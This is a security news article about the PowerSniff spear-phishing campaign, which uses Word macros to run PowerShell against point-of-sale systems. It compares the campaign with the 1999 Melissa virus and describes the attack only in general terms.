The return of the Microsoft Word macro virus with malicious documents that execute PowerShell scripts

Back to the nineties with spear-phishing attacks using Word macros

Threat researchers at Palo Alto Networks have warned of a malware campaign that uses malicious Microsoft Word macros to execute PowerShell scripts in an attack that they have dubbed "PowerSniff".

The attack is propagated via phishing emails, prompting recipients to open the attached Word document. If they have not enabled macros in Microsoft Office, they are prompted to do so in order for the attack to proceed.

It then secretly opens powershell.exe, ascertains whether the user is running 32- or 64-bit Windows, and downloads a PowerShell script containing a shellcode. The shellcode is then decrypted and the malware payload executed.

According to independent expert David Bisson, writing for Graham Cluley's security website, the malware appears to be targeting point-of-sale systems - while actively avoiding schools and school children.

"At this point in time, the malware performs a series of actions to gather more information about the machine on which it is running. For instance, it scans for usernames like "MALWARE" and "VIRUS" as well as a number of libraries to determine whether it is running in a virtualized environment or sandbox. This is clearly an attempt to avoid analysis by anti-virus researchers," wrote Bisson in an analysis.

He continued: "PowerSniff also checks for the absence of the strings 'TEACHER', "STUDENT', 'SCHOOLBOARD', 'PEDIATRICS', and 'ORTHOPED', but actively looks for the presence of 'POS', 'STORE', 'SHOP', and 'SALE'."

According to Josh Grunzweig and Brandon Levene at Palo Alto Networks, who uncovered the attack, the virus has so far been limited to spear-phishing attacks - targeted attacks involving about 1,500 emails.

"The majority of these emails contain specific information about the victim's company, such as their phone number, physical address, as well as the name of the individual. This additional information is not typically included in widespread spam campaigns, and can often provide a sense of trust when seen by the victim, which in turn may lead to a higher number of opened attachments," claim Grunzweig and Levene.

Information gleaned from the attacks is relayed back to command and control servers.

The use of Word macros as the foundation for the attack has echoes of the Word Macro viruses that proliferated during the 1990s, culminating in the well-know Melissa virus or worm of 1999.

When a user opened Word document containing Melissa, it infected their machine and replicated by sending a similarly infected email to the first 50 people in their address book. Melissa forced Microsoft to take security far more seriously. David L. Smith of New Jersey was identified as the virus's author, with the Microsoft Word globally unique identifier pointing the finger in his direction.

He pleaded guilty in court and was sentenced to ten years in prison, and fined $5,000. However, he served just 20 months in prison.

Tune in at 2pm today for a Computing web seminar on how to combat the threat of phishing. Sign-up to "Are you a phish or a whale?" now!